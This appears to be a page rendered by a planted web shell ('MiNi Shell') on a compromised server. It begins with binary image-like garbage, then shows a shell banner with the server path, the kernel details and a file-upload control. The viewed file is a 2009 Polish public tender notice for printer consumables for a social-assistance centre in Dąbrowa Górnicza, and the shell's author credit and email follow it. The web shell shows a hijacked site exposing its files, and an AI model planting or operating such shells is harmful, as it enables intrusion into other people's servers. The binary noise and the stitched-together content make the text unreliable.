JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101596-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Dostawa  materiałów eksploatacyjnych i drukujących  na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 101596 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów eksploatacyjnych i drukujących  na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: Dostawę  materiałów eksploatacyjnych i drukujących  na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej.  
 ZP-4 -29U-MOPS-2009
- zgodnie  z wymogami  określonymi  w niniejszej  Specyfikacji Istotnych Warunków Zamówienia  zwanej dalej SIWZ.
  
Przedmiot zamówienia  oraz ilość i szczegółowy rodzaj asortymentu   określono w kalkulacji cenowej zamówienia publicznego tj. załączniku Nr 2, który stanowi integralną część niniejszej SIWZ oraz  w treści projektu umowy  tj. załącznik nr 4 do niniejszej SIWZ. 
                                                               
Wykonawca zagwarantuje dostawy przedmiotu umowy  własnym środkiem transportu, z dostawą na miejsce  wskazane przez Zamawiającego, terminowo w dniu  i godzinie  uprzednio uzgodnionej  z właściwym   pracownikiem  MOPS, na własny koszt, zachowując  ceny ofertowe.  

Dostarczony towar winien być  zapakowany oddzielnie asortymentowo  i opisany zgodnie z pozycjami kalkulacji tj. załącznik nr 2 do niniejszej specyfikacji i umowy oraz z określonym terminem ważności.

Dostarczony  towar  niezgodny  z zapotrzebowaniem , wadliwy  lub przeterminowany  będzie zwracany. Nie dopuszcza się, aby kasety z tonerem były nieszczelne, na skutek czego zanieczyszczają urządzenia drukujące i kopiujące powodując ich uszkodzenie lub zniszczenie.
Wykonawca bierze na siebie  pełną odpowiedzialność  za uszkodzenie sprzętu spowodowane używaniem zaoferowanych materiałów. 

W przypadku uszkodzenia  urządzenia, którego przyczyną  będzie użycie dostarczonych materiałów  eksploatacyjnych , Wykonawca zobowiązany jest  do zwrotu kosztów naprawy urządzenia, a także w przypadku takiej konieczności, zwrotu kosztów zleconej przez Zamawiającego  ekspertyzy rzeczoznawcy.

Jeżeli w trakcie umowy  Zamawiający stwierdzi, że dostarczony  produkt nie jest kompatybilny  z urządzeniem do którego jest przeznaczony, ( urządzenie nie identyfikuje we właściwy sposób  stanu pojemności tonera lub tuszu), Wykonawca jest zobowiązany  wymienić towar na nowy współpracujący z urządzeniem drukującym ( kopiującym) bez zmiany ceny.

Asortyment określony w niniejszym zamówieniu  może pochodzić od producenta sprzętu lub być porównywalny  ( nie gorszy ) pod względem jakości  i wydajności z fabrycznie nowymi. Oferowany towar winien być kompatybilny  ze sprzętem , do którego jest zamówiony o parametrach porównywalnych,  nie gorszych ( pojemność tuszu, tonera, wydajność i jakość wydruku) w stosunku  do typu zamawianego  produktu  fabrycznie nowego.

Zamawiający zastrzega sobie  prawo do rezygnacji lub zmiany  poszczególnego asortymentu wyszczególnionego w załączniku nr 2 tj. Kalkulacji cenowej w ramach ceny ofertowej  w każdym czasie trwania umowy.
Tusz do drukarki    HP DeskJet 3420 czarny	- 4szt,	
Tusz do drukarki  HP DeskJet 3420 kolor	- 2szt,	
Tusz do drukarki  HP DeskJet 3845 czarny	- 2szt,	
Tusz do drukarki   HP DeskJet 3845 kolor	- 2szt,	
Tusz do drukarki  HP DeskJet 5150 czarny	- 53szt,	
Tusz do drukarki   HP DeskJet 5150 kolor	- 14szt,	
Tusz do drukarki  HP DeskJet 5550 czarny	- 6szt,	
Tusz do drukarki  HP DeskJet 5550 kolor	- 3szt,	
Tusz do drukarki HP DeskJet 5940 czarny	- 126szt,	
Tusz do drukarki HP DeskJet 5940 kolor	- 50szt,	
Tusz do drukarki   HP DeskJet 6490 czarny	- 31szt,	
Tusz do drukarki HP DeskJet 6490 kolor	- 9szt,	
Tusz do drukarki   HP DeskJet 6980 czarny	- 15szt,	
Tusz do drukarki  HP DeskJet 6980 kolor	- 7szt,	
Tusz do drukarki  HP PSC 1315 czarny	- 12szt,	
Tusz do drukarki   HP PSC 1315 kolor	- 8szt,	
Tusz do drukarki   HP Deskjet F 4180 czarny	- 12szt,	
Tusz do drukarki  HP DeskJet F 4180 kolor	- 4szt,	
Tusz do drukarki HP Photosmart D-5360 czarny	- 6szt,	
Tusz do drukarki   HP Photosmart D-5360 kolor	- 6szt,	
Tusz do drukarki  HP DeskJet 840C czarny	- 12szt,	
Tusz do drukarki   HP DeskJet 840C kolor	- 8szt,	
Toner do urządzenia wielofunkcyjnego  HP LaserJet 3020	- 89szt,	
Toner do urządzenia wielofunkcyjnego  CANON iR1022iF	- 3szt,	
Toner do urządzenia wielofunkcyjnego  HP LaserJet P-1006	- 6szt,	
Toner do urządzenia wielofunkcyjnego  HP LaserJet 1200	- 10szt,	
Toner do urządzenia wielofunkcyjnego  HP LaserJet 3052	- 36szt,	
Toner do urządzenia wielofunkcyjnego   HP LaserJet 1100A	- 26szt,	
Toner do urządzenia wielofunkcyjnego    HP LaserJet 1100	- 4szt,	
Toner do urządzenia wielofunkcyjnego SAMSUNG SCX-4720FN	- 67szt,	
Toner do urządzenia wielofunkcyjnego SAMSUNG Laser Printer ML-2250 - 4szt,
Toner do urządzenia wielofunkcyjnego SAMSUNG SCX-4828FN	- 15szt,	
Toner do urządzenia wielofunkcyjnego  Panasonic KX-MB783	- 27szt,	
Bęben do urządzenia wielofunkcyjnego jw.	- 10szt,	
Toner do urządzenia wielofunkcyjnego  Panasonic KX-MB773	- 8szt,	
Bęben do urządzenia wielofunkcyjnego jw.	- 5szt,	
Toner do drukarki HP LaserJet P 2015	- 8szt,	
Toner do drukarki HP LaserJet M 2727 nf	- 4szt,	
Toner do drukarki  HP LaserJet 5L	- 4szt,	
Toner do ksera     UTAX CD 1216	- 5szt,	
Toner do ksera    CANON 1550	- 2szt,	
Toner do ksera  KYOCERA KM - 1620	- 12szt,	
Toner do ksera     RICOH AFICIO 2022	- 15szt,	
Toner do ksera  KYOCERA FS - 1118 MFP	- 9szt,	
Taśma do faksu PHILIPS Laserfax 925	- 3szt,	
Taśma atramentowa do faxu magic 3 primo z kartą	- 4szt,	
Folia do faksu PHILIPS MAGIC 5 PFA 351	- 6szt,	
Folia do faksu Panasonic KX FP 701	- 6szt,	
Toner do faksu Panasonic KX FL 613 Laser	- 2szt,	
Toner do faksu Panasonic KX FT 906 PD	- 4szt,	
Taśma do drukarki        OKI 3320 	- 94szt,	
Taśma do drukarki  EPSON LX - 100	- 5szt,	
Kaseta do maszyny do  pisania OLIMPIA Komfort Memory Display	- 3szt,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.12.43.00-7, 22.60.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia określonego w niniejszej  specyfikacji mogą ubiegać się wykonawcy, którzy:
1.  Spełniają wymagania określone w art. 22 ust. 1  ustawy  z dnia 29 stycznia 2004 r. -  
     Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz.1655 z późn. zm.) 
2.  Nie podlegają wykluczeniu  z postępowania  o udzielenie zamówienia  - art. 24 ust. 1 i 2  
     ustawy Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655  z późn. zm.) 
3.  W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie  zamówienia , a w przypadku gdy okres  prowadzenia działalności jest krótszy- w tym okresie wykonali, (a w przypadku świadczeń okresowych  lub ciągłych są w trakcie wykonywania) , co najmniej 1 dostawę odpowiadającą swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego. ( minimum 1 referencje lub inny dokument potwierdzający należyte wykonanie zamówienia) 
 Przez dostawę  odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia  należy rozumieć  minimum jedno zamówienie podobne do przedmiotu zamówienia tj. 
     -Dostawa  materiałów eksploatacyjnych i drukujących   w okresie ostatnich 3 lat  przed 
      dniem wszczęcia postępowania, a w przypadku gdy okres  prowadzenia działalności jest
       krótszy- w tym okresie,  co najmniej 1 zamówienie którego wartość  jest równa lub 
       przekracza kwotę - 40 000,00 zł brutto (w skali zamówienia).

Ocena spełnienia  warunków - udziału  w postępowaniu  ( formalnych)  i zdolności  do wykonania  zamówienia ( merytorycznych)  - wymaganych   od Wykonawców  dokonywana będzie  w oparciu  o złożone wraz z ofertą  oświadczenia o spełnieniu  warunków  udziału  w postępowaniu  o udzielenie zamówienia  publicznego  i   dokumenty  potwierdzające  spełnienie tych warunków według  formuły spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie  spełnienia warunków  (formalnych) i zdolności  do wykonania  zamówienia ( merytorycznych) udziału w postępowaniu  Wykonawca jest zobowiązany  złożyć :

1. Aktualny  odpis  z właściwego rejestru lub aktualne  zaświadczenie  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej  niż  6 miesięcy  przed upływem terminu składania ofert.

2. Oświadczenie stwierdzające, że Wykonawca spełnia wymagania określone w art. 22 ust.1oraz nie podlega wykluczeniu  z art.  24 ust 1 i 2 ustawy   Prawo zamówień publicznych  z dnia 29 stycznia 2004 r. W przypadku składania ofert przez  Wykonawców występujących wspólnie, oświadczenie winno być  podpisane na jednym druku  przez  każdego z ubiegających się  o udzielenie zamówienia  wykonawców    - wg wzoru - zał. nr 3 - wskazana aktualna data podpisania dokumentu. 

3. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych    dostaw  w okresie  ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego , a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie,  odpowiadających swoim rodzajem  i wartością  dostawom  stanowiącym  przedmiot zamówienia z podaniem ich wartości , przedmiotu , dat wykonania i odbiorców, oraz załączeniu dokumentów potwierdzających, że te dostawy zostały wykonane należycie- co najmniej 1 referencja , opinia lub inny dokument potwierdzający wykonanie dostawy, której wartość  jest równa lub przekracza kwotę - 40 000,00 zł. (w skali zamówienia). - załącznik nr 5

4. Wypełniony formularz kalkulacji  cenowej - załącznik nr 2 - wskazana aktualna data podpisania dokumentu.

5. Wypełniony  formularz  ofertowy wykonany według wzoru Zamawiającego ( zał. nr 1 ) Wymagana jest oferta wykonana na lub wg ścisłego wzoru Zamawiającego. - wskazana aktualna data podpisania dokumentu.

6.  Zaparafowany  przez Wykonawcę projekt  umowy (załącznik nr  4),   potwierdzający przyjęcie warunków załączonego wzoru umowy.

7. Do oferty należy załączyć: Pełnomocnictwo  do reprezentowania Wykonawcy, jeżeli zostało ono ustanowione  lub  do reprezentowania Wykonawców  wspólnie ubiegających się  o zamówienie, przedłożone  w formie oryginału  lub kopii poświadczonej  przez notariusza.

8. Upoważnienie do podpisywania  ofert i występowania  w przetargu  w imieniu wykonawcy musi być dołączone  do oferty  lub musi   bezpośrednio wynikać  z przedstawionych dokumentów. Gdy wykonawcę reprezentuje pełnomocnik  do oferty musi być załączone  pełnomocnictwo posiadające zakres i podpisane przez osobę(y)  reprezentującą(e) osobę(y)  prawną(e) lub fizyczną(e)  lub kopię poświadczoną  za zgodność z oryginałem przez notariusza.

Uwagi:
1. Dokumenty określone w  rozdz. VI. pkt 1,2  wymagane są w celu potwierdzenia warunku, że  Wykonawca posiada uprawnienia do wykonania określonej działalności  lub czynności  oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
2.Dokumenty określone  w  rozdz. VI. pkt 3 wymagane są w celu potwierdzenia warunku posiadana przez wykonawcę   niezbędnej wiedzy i doświadczenia do wykonania zamówienia.  
3. Zamawiający  zgodnie  z art. 26 ust. 3 uPzp wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych  przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy nie złożyli pełnomocnictw , albo którzy złożyli  wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa , do ich  złożenia  w wyznaczonym  terminie, chyba  że  mimo ich złożenia   oferta wykonawcy podlega odrzuceniu albo  konieczne byłoby unieważnienie postępowania. Złożone  na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać  spełnienie przez Wykonawcę  warunków udziału  w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później  niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie  do udziału w postępowaniu albo termin składania ofert.
4. Zamawiający wzywa także , w wyznaczonym  przez siebie terminie , do złożenia wyjaśnień dotyczących  oświadczeń lub  dokumentów o których mowa w rozdz. VI niniejszej SIWZ.
5. Dokumenty o których mowa wyżej  mogą być złożone w formie  oryginału  lub kopii  poświadczonej za  zgodność z oryginałem  przez  osobę (y)  uprawnione  do podpisywania oferty.
6. Zamawiający może  żądać  przedstawienia oryginału  lub notarialnie  poświadczonej kopii  dokumentu wyłącznie  wtedy, gdy  złożona przez Wykonawcę  kopia dokumentu  jest nieczytelna  lub budzi wątpliwości, co do prawdziwości.
7. Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej:
7.1  Zamiast  dokumentów , o których mowa w rozdziale VI   pkt 1 SIWZ składa dokument lub dokumenty , wystawione w kraju, w którym  ma siedzibę  lub miejsce  zamieszkania , potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono wobec niego zakazu ubiegania się  o zamówienie.
7. 2   Jeżeli w kraju pochodzenia osoby lub  w kraju, w którym  Wykonawca  ma siedzibę  lub miejsce  zamieszkania , nie wydaje się dokumentów , o których mowa w rozdz. VI. pkt 1  zastępuje się je  dokumentem   zawierającym  oświadczenie złożone przed notariuszem , właściwym organem sądowym, administracyjnym albo organem  samorządu  zawodowego lub gospodarczego  odpowiednio  kraju pochodzenia  osoby  lub kraju , w którym  Wykonawca  ma siedzibę  lub miejsce zamieszkania wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert.
7.3 Dokumenty są składane w formie oryginału  lub kopii poświadczonej  za zgodność  z oryginałem  przez Wykonawcę . 
7.4 Dokumenty sporządzone w języku obcym Wykonawca dostarcza  wraz z tłumaczeniem  na język polski poświadczonym  przez Wykonawcę.
8.Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną dotyczącą składania nieprawdziwych zeznań i oświadczeń  wynikającą z art. 297 KK. W razie stwierdzenia, że złożone przez dostawcę lub wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 KPK - zawiadomi o tym fakcie właściwy organ ścigania.
9. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów oraz oświadczeń, zgodnie z art. 24 ust. 2 pkt 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych spowoduje wykluczenie go z postępowania.
10.  Załączone oświadczenia  winny posiadać daty  wystawienia dokumentu świadczące o ich ważności określone w rozdz. VI  niniejszej specyfikacji.
11. Oferty, opinie biegłych, oświadczenia, zawiadomienia, wnioski, inne  dokumenty i informacje składane przez Zamawiającego i wykonawców oraz umowa w sprawie zamówienia publicznego stanowią załączniki do protokołu.
12. Pod używanym w nin. SIWZ pojęciem oferta rozumie się ofertę właściwą tj. wypełniony i prawidłowo podpisany formularz OFERTA będący załącznikiem nr 1 do specyfikacji istotnych warunków zamówienia, a także dokumenty wymagane zgodnie z  artykułem 44 ustawy Prawo zamówień publicznych potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu. Dokumenty te wymieniono enumeratywnie w rozdz. VI nin. SIWZ. Wykonawca aby wziąć udział w niniejszym postępowaniu przetargowym winien złożyć ofertę właściwą i komplet dokumentów podanych w rozdz. VI SIWZ, potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w rozdz. V niniejszej SIWZ.
13. Protokół wraz z załącznikami jest jawny. Załączniki do protokołu udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu postępowania, z tym że oferty są jawne od chwili ich otwarcia, a wnioski o dopuszczenie  do udziału w postępowaniu po upływie terminu ich składania.
14. Nie ujawnia się informacji  stanowiących tajemnicę  przedsiębiorstwa  w rozumieniu  przepisów  o zwalczaniu  nieuczciwej konkurencji , jeżeli  Wykonawca  nie później  niż w terminie   składania ofert zastrzegł , że  nie mogą  one być  udostępnione. Wykonawca nie może zastrzec informacji , o których mowa  w art.86 ust.4 ustawy Pzp.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczaj
ul. Skibińskiego 1 pok. nr 16 
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczaj
ul. Skibińskiego 1 pok. nr 16 
41-300 Dąbrowa Górnicza.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 27.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com